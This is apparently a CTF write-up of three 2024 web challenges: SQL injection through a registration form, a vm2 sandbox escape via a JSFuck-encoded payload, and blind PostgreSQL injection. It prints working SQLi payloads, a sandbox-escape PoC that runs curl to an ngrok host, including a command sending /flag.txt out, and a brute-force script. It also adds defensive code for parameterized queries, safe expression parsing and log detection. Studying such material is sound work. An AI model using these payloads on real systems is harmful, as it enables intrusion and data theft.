0xk4k45h1
Arab Cyber War Games Qualifications 2024
Web: unmasked
Description

You need to read the flag stored in /flag.txt

Solution

When we start the challenge we will see this login page and register page. After examining the register page I tried to register an account with username = admin and I got an error as the name is used before.

The interesting part is that I get the query in the response in case of error. This response gave me interesting information about the query: we knew it's an INSERT query and we knew how the parameters we provide are put into this query.

I created a normal user account and logged in to see the next page, and I found an upload page. There are many interesting notes in this page, like:

- The userId
- The email of the user is reflected in the page

I tried to upload different files (php files, images, etc.) but there's no way to access them. I guessed there's a directory for uploads at /uploads and this was true, but I got status code 403 Forbidden.

Anyway, I went back to register and my main goal was to get access to admin's account. I thought I could get access to more resources by getting access to admin's account. I made sure that username is vulnerable to SQLi, and from the errors I knew it's a MariaDB database. After thinking and attempts I reached the idea of using stacked queries in this sequence: Insert, Update, Insert. I tried this:

```
username=admin1','y@g.c','8870b2ae75733c08f557a6333e1aa7502ca50541');UPDATE+users+SET+password+%3d+'8870b2ae75733c08f557a6333e1aa7502ca50541'+WHERE+username+=+'admin';+INSERT+INTO+users(username,+email,+password)+VALUES+('kakashi2&email=adminqqq%40admin.com&password=admin
```

By using this payload I thought I'd be able to insert a user whose name is admin1, update the password of admin, and insert another user whose name is kakashi2, but I got this error. Actually, I couldn't solve it this way, so I tried a different approach, which is SSTI in the email parameter, but also no interesting output.
I read the challenge again and found that we just need to read /flag.txt. After searching I found that there's a function called LOAD_FILE(file path) in MariaDB. I used it to load /flag.txt in the email parameter, because the email parameter is reflected in the next page, so we can see the file in that page. I modified the payload to be this:

```
username=admin3',LOAD_FILE('/flag.txt'),'8870b2ae75733c08f557a6333e1aa7502ca50541')#;&email=adminqqq%40admin.com&password=admin
```

Then login using this account AND ….. GG !!!
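The two things the registration form got wrong, the query built by string concatenation and the driver error echoed back together with the query text, are easiest to see side by side. This is an added example written for this page, not the challenge's code: it uses an in-memory SQLite table in place of the challenge's MariaDB users table, a payload shaped like the stacked-query attempt above with placeholder hashes, and hypothetical register_vulnerable / register_safe handlers.

```python
import sqlite3

# Payload in the shape the writeup used: close the VALUES list, then stack an
# UPDATE and a second INSERT. Constructed for this example; the hashes are
# placeholders, not values from the challenge.
STACKED_PAYLOAD = (
    "x','x@example.test','placeholder-hash');"
    "UPDATE users SET password = 'attacker-hash' WHERE username = 'admin';"
    "INSERT INTO users(username, email, password) VALUES ('y"
)


def make_db():
    """In-memory SQLite stand-in for the challenge's MariaDB users table (constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT UNIQUE, email TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'admin@example.test', 'original-admin-hash')")
    conn.commit()
    return conn


def register_vulnerable(conn, username, email, password_hash):
    """Builds the INSERT by string concatenation, the pattern the challenge's error
    message exposed. executescript() stands in for a driver configured to accept
    several statements per call, which is what stacked queries depend on. The
    error branch echoes the query text, as the challenge did."""
    sql = (
        "INSERT INTO users(username, email, password) "
        f"VALUES ('{username}', '{email}', '{password_hash}')"
    )
    try:
        conn.executescript(sql)
        return "ok"
    except sqlite3.Error as e:
        return f"error: {e} in query: {sql}"


def register_safe(conn, username, email, password_hash):
    """Parameterized INSERT: values travel separately from the SQL text, so quotes
    and semicolons in the input are stored as data and never run as SQL. Errors
    are reported generically so the query shape is not disclosed to the client."""
    try:
        conn.execute(
            "INSERT INTO users(username, email, password) VALUES (?, ?, ?)",
            (username, email, password_hash),
        )
        conn.commit()
        return "ok"
    except sqlite3.IntegrityError:
        return "error: username already taken"


def admin_password(conn):
    return conn.execute("SELECT password FROM users WHERE username = 'admin'").fetchone()[0]


def user_count(conn):
    return conn.execute("SELECT COUNT(*) FROM users").fetchone()[0]


def has_user(conn, username):
    return conn.execute("SELECT 1 FROM users WHERE username = ?", (username,)).fetchone() is not None


if __name__ == "__main__":
    v = make_db()
    print(register_vulnerable(v, STACKED_PAYLOAD, "e@example.test", "h"), admin_password(v), user_count(v))
    s = make_db()
    print(register_safe(s, STACKED_PAYLOAD, "e@example.test", "h"), admin_password(s), user_count(s))
```

Against the vulnerable handler the stacked UPDATE rewrites admin's password and a third row appears; against the parameterized handler the same input is stored verbatim as one username and admin is untouched. For the LOAD_FILE() step used above, two MariaDB-side controls matter as well: LOAD_FILE() requires the FILE privilege and returns NULL for paths outside the directory set by secure_file_priv, so the account the web app connects with should not hold FILE, and the connector's multi-statement support should stay off.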
CTF · 2024-08-03
Web: secure calc
Description

This site is secure and sandboxed.

Solution

When we start the challenge we will find the source code, which is a NodeJS Express site, and it's a small app as you see:

```js
const express = require("express");
const { VM } = require("vm2");
const app = express();
const vm = new VM();

app.use(express.json());

app.get('/', function (req, res) {
    return res.send("Hello, just index : )");
});

app.post('/calc', async function (req, res) {
    let { eqn } = req.body;
    if (!eqn) {
        return res.status(400).json({ 'Error': 'Please provide the equation' });
    } else if (eqn.match(/[a-zA-Z]/)) {
        return res.status(400).json({ 'Error': 'Invalid Format' });
    }
    try {
        result = await vm.run(eqn);
        res.send(200, result);
    } catch (e) {
        console.log(e);
        return res.status(400).json({ 'Error': 'Syntax error, please check your equation' });
    }
});

app.listen(3000, '0.0.0.0', function () {
    console.log("Started !")
});
```

We see `const {VM} = require("vm2");`. I searched for it, and I knew the version from the package.json file attached with the challenge: the version was "vm2": "^3.9.19". It's vulnerable to sandbox escaping and the PoC is in this article. We see that the code executed is passed to the vm.run(code) function, and we have this function in the code of the challenge.

When we examine the /calc endpoint we see that it's an endpoint for solving equations, and we will find 4 steps:

1. Checking if there's data in the request body (this data will be in JSON format).
2. The data is passed to a regex checker to make sure that the data in the request body doesn't contain any alphabetical characters.
3. vm.run(code), at which the equation will be solved or our code will be executed, and that's our goal.
4. Syntax error if there is any error from vm.run(code).

I have the CVE PoC code so I can escape the sandbox, but the problem is in bypassing the regex.
When I send normal data without any alphabetical characters I get the result of the equation, like this. When I try sending any characters I get "Error":"Invalid Format". After many attempts I got a syntax error that told me JSON.parse is used. This made me think about prototype pollution. I tried:

```json
{ "__proto__": { "eqn": "1+2" } }
```

but it couldn't detect that it's an equation. I tried many encoding algorithms like unicode, but they didn't work. After many attempts I found the suitable encoding way: it's JSFuck, because it consists of symbols only, so it will pass the regex. I used this payload:

```js
async function fn() {
    (function stack() {
        new Error().stack;
        stack();
    })();
}
p = fn();
p.constructor = {
    [Symbol.species]: class FakePromise {
        constructor(executor) {
            executor(
                (x) => x,
                (err) => {
                    return err.constructor.constructor('return process')().mainModule.require('child_process').execSync('curl http://ngrokIP:ngrokport');
                }
            )
        }
    }
};
p.then();
```

and converted it to JSFuck using any online converter and sent that request. The curl command worked well. Now let's read the flag by making the command:

```
curl -X POST --data-binary "@/flag.txt" http://ngrokIP:port
```

Convert it and send the request like we did before AND .. GG !!
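The regex step is the weak point in that design: /[a-zA-Z]/ decides by spelling, while the sandbox receives whatever the spelling denotes, so a symbol-only encoding of arbitrary code passes. The safer shape for a calculator is to parse the input into an expression tree and allow only arithmetic nodes, so nothing is ever executed. The following is an added example written for this page in Python, not the challenge's code; it re-implements the challenge's letter filter for comparison and uses the hypothetical names safe_calc and is_rejected.

```python
import ast
import operator
import re

# The challenge's only check, re-implemented for comparison (constructed here,
# not the challenge's code): refuse input that contains an ASCII letter.
LETTER_FILTER = re.compile(r"[a-zA-Z]")


def passes_letter_filter(expr):
    return LETTER_FILTER.search(expr) is None


# Allowlist: the only node types and operators a calculator needs. Names, calls,
# attribute access, subscripts, lists and lambdas are refused before evaluation,
# however they are spelled.
BIN_OPS = {
    ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul,
    ast.Div: operator.truediv, ast.Mod: operator.mod, ast.Pow: operator.pow,
}
UNARY_OPS = {ast.UAdd: operator.pos, ast.USub: operator.neg}
MAX_LEN, MAX_DEPTH, MAX_EXPONENT = 200, 50, 64


class RejectedExpression(ValueError):
    pass


def _eval(node, depth=0):
    if depth > MAX_DEPTH:  # bound recursion so nested parentheses cannot exhaust the stack
        raise RejectedExpression("expression nested too deeply")
    if isinstance(node, ast.Expression):
        return _eval(node.body, depth + 1)
    if isinstance(node, ast.Constant) and type(node.value) in (int, float):
        return node.value
    if isinstance(node, ast.UnaryOp) and type(node.op) in UNARY_OPS:
        return UNARY_OPS[type(node.op)](_eval(node.operand, depth + 1))
    if isinstance(node, ast.BinOp) and type(node.op) in BIN_OPS:
        left = _eval(node.left, depth + 1)
        right = _eval(node.right, depth + 1)
        if isinstance(node.op, ast.Pow) and abs(right) > MAX_EXPONENT:
            raise RejectedExpression("exponent too large")  # bounds CPU and memory use
        return BIN_OPS[type(node.op)](left, right)
    raise RejectedExpression(f"disallowed syntax: {type(node).__name__}")


def safe_calc(expr):
    """Evaluate a pure arithmetic expression, or raise RejectedExpression."""
    if len(expr) > MAX_LEN:
        raise RejectedExpression("expression too long")
    try:
        tree = ast.parse(expr, mode="eval")
    except (SyntaxError, ValueError) as e:
        raise RejectedExpression("syntax error") from e
    try:
        return _eval(tree)
    except ArithmeticError as e:  # division by zero, float overflow
        raise RejectedExpression("arithmetic error") from e


def is_rejected(expr):
    try:
        safe_calc(expr)
        return False
    except RejectedExpression:
        return True


if __name__ == "__main__":
    for sample in ["1+2", "(1+2)*3", "[]+[]", "(+[])", "9**9**9"]:
        print(sample, passes_letter_filter(sample), "rejected" if is_rejected(sample) else safe_calc(sample))
```

[]+[] and (+[]) pass the letter filter, which is all the challenge checked, but the parser refuses them because a list is not an arithmetic node; the equivalent fix in the Node app is a small expression parser and no vm.run at all. The exponent cap and nesting limit cover what a pure-arithmetic evaluator still has to handle: 9**9**9 and deeply nested parentheses exhaust memory and stack rather than escape anything.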
CTF · 2024-08-03
Web: real
Description

A BBH got a vulnerability in this site but the triager needs a POC. The flag will be the db username in UPPERCASE and there's a rate limit (1 request per second).

Solution

When we start the challenge we will see this login page. It's a very very simple page, and during my first attempts I noticed that the output can be:

- welcome (status code 200): this occurs when the login is done successfully
- error (status code 400): this occurs when the login fails (wrong creds or wrong syntax)
- filtered: this occurs when using symbols or words which are forbidden

When I tried username=admin%27--&password=a I got welcome in the response, like this. We got the injection point and I see it's a blind SQLi.

I was trying to retrieve the data from the tables but there was a misunderstanding. I thought they wanted a different user in the same table, but it wants the username of the db, which is the user connected to the database. This misunderstanding made me take too much time, as I wanted to get data from the users table and the () were filtered, so I was in a rabbit hole.

After noticing that we need the db user I started thinking in a different way. I wanted to know the type of database. I noticed that the database accepts -- as a comment and refuses #, and after asking ChatGPT I knew that my database could be Oracle or PostgreSQL. After searching about the differences I found that there's a table called all_tables in Oracle that corresponds to information_schema.tables in PostgreSQL. I made sure that the db is PostgreSQL using these parameters:

```
username=admin%27union%20select%20null,null%20from%20information_schema.tables--&password=a
```

and got welcome in the response. Now I want to get the postgres db username. After searching I found that to get it we use `select current_user`. There may be other ways, but this worked for me and was very simple.
Now I want to inject it in the username parameter, and this can be done by:

```
admin' and current_user like 'A%'--
```

This will return welcome if the first character in current_user is A. But the problem here is that like is filtered, so after asking ChatGPT I found an alternative, which is:

```
admin' and current_user ~ '^A'--
```

and it has the same functionality. We should run the same query for all possible characters and for the length of the username. I created this script to do this job:

```python
import requests
import time
import urllib3

urllib3.disable_warnings()

# Base URL and target endpoint
url = "https://real.ascwg-challs.app/login"

# Headers for the request
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate, br",
    "Content-Type": "application/x-www-form-urlencoded",
    "Origin": "https://real.ascwg-challs.app",
    "Referer": "https://real.ascwg-challs.app/",
    "Upgrade-Insecure-Requests": "1",
    "Sec-Fetch-Dest": "document",
    "Sec-Fetch-Mode": "navigate",
    "Sec-Fetch-Site": "same-origin",
    "Sec-Fetch-User": "?1",
    "Priority": "u=0, i",
    "Te": "trailers"
}

# Characters to iterate over
characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZ{}_0123456789!@#%^&*()-=_+[]{}|;:',.<>?/`~\"\\abcdefghijklmnopqrstuvwxyz"

# Base injection point
base_injection = "admin'AND CURRENT_USER ~ '^"
password = "a"


def bruteforce():
    # Initialize the discovered prefix
    prefix = ""
    # Try to find each character of the username
    while True:
        for char in characters:
            # Candidate: the prefix found so far plus one more character
            current = prefix + char
            injection = base_injection + current + '\'--'
            data = f"username={injection}&password={password}"
            # Send POST request
            response = requests.post(url, headers=headers, data=data, verify=False)
            # Wait for 1 second to respect the rate limit
            time.sleep(1)
            # Check for a successful response
            if response.status_code == 200:
                prefix += char
                print(f"Found: {prefix}")
                break  # Move to the next character
        else:
            # No candidate extended the prefix: the whole name has been recovered
            return prefix


if __name__ == "__main__":
    bruteforce()
```

And .. GG !!
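From the defender's side, the loop above has a recognisable shape that does not depend on volume: the challenge's rate limit of one request per second is exactly what makes a request-rate threshold useless here, but each probe is the previous one with one character appended or with its last character changed. The following detector is an added example written for this page, not part of the writeup; it runs over constructed login-audit lines (invented for this example) and uses the hypothetical functions analyze and chained.

```python
import re
from collections import defaultdict

# Constructed sample of application login-audit lines (invented for this example,
# not logs from the challenge). The first five mimic the character-by-character
# probes the script above sends; the rest are ordinary logins.
SAMPLE_LOG = """\
2024-08-03T10:00:00Z ip=10.0.0.5 status=400 user=admin'AND CURRENT_USER ~ '^A'--
2024-08-03T10:00:01Z ip=10.0.0.5 status=200 user=admin'AND CURRENT_USER ~ '^P'--
2024-08-03T10:00:02Z ip=10.0.0.5 status=400 user=admin'AND CURRENT_USER ~ '^PA'--
2024-08-03T10:00:03Z ip=10.0.0.5 status=200 user=admin'AND CURRENT_USER ~ '^PO'--
2024-08-03T10:00:04Z ip=10.0.0.5 status=200 user=admin'AND CURRENT_USER ~ '^POS'--
2024-08-03T10:00:05Z ip=10.0.0.9 status=200 user=alice
2024-08-03T10:00:06Z ip=10.0.0.9 status=400 user=alice
2024-08-03T10:00:07Z ip=10.0.0.7 status=400 user=o'brien
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) ip=(?P<ip>\S+) status=(?P<status>\d+) user=(?P<user>.*)$")

# Signature signal: a quote followed by a boolean/union keyword, a trailing SQL
# comment, or the LIKE / regex-match operators the writeup used.
INJECTION_RE = re.compile(r"'\s*(and|or|union)\b|(--|#)\s*$|\blike\b|\bcurrent_user\b|~", re.I)

# Closing quote and comment marker that terminate an injected string; stripped
# so consecutive probes are compared on the part that actually changes.
TRAILER_RE = re.compile(r"'?\s*(--|#|/\*)\s*$")


def parse(log_text):
    rows = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            rows.append(m.groupdict())
    return rows


def probe_core(user):
    return TRAILER_RE.sub("", user)


def chained(prev, curr):
    """True when curr looks like the next step of a character-by-character search:
    prev plus exactly one more character, or the same length as prev with only the
    last character changed (the next candidate for the same position)."""
    if prev == curr:
        return False
    if len(curr) == len(prev) + 1 and curr.startswith(prev):
        return True
    return len(curr) == len(prev) and curr[:-1] == prev[:-1]


def analyze(log_text, chain_threshold=3):
    """Per source IP: count signature hits and chained probes, flag if either trips."""
    per_ip = defaultdict(lambda: {"signature_hits": 0, "chained_probes": 0, "last": None})
    for row in parse(log_text):
        stats = per_ip[row["ip"]]
        if INJECTION_RE.search(row["user"]):
            stats["signature_hits"] += 1
        core = probe_core(row["user"])
        if stats["last"] is not None and chained(stats["last"], core):
            stats["chained_probes"] += 1
        stats["last"] = core
    findings = {}
    for ip, s in per_ip.items():
        findings[ip] = {
            "signature_hits": s["signature_hits"],
            "chained_probes": s["chained_probes"],
            "suspicious": s["signature_hits"] > 0 or s["chained_probes"] >= chain_threshold,
        }
    return findings


if __name__ == "__main__":
    for ip, finding in analyze(SAMPLE_LOG).items():
        print(ip, finding)
```

The signature regex is a cheap first signal and will occasionally hit real names such as d'or; the chained-probe count is the stronger one because it is independent of the operator the attacker picked (LIKE, ~, or whatever else the filter missed) and of the request rate. On the sample above 10.0.0.5 trips both, while alice's failed retry and o'brien's apostrophe trip neither.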
CTF · 2024-08-03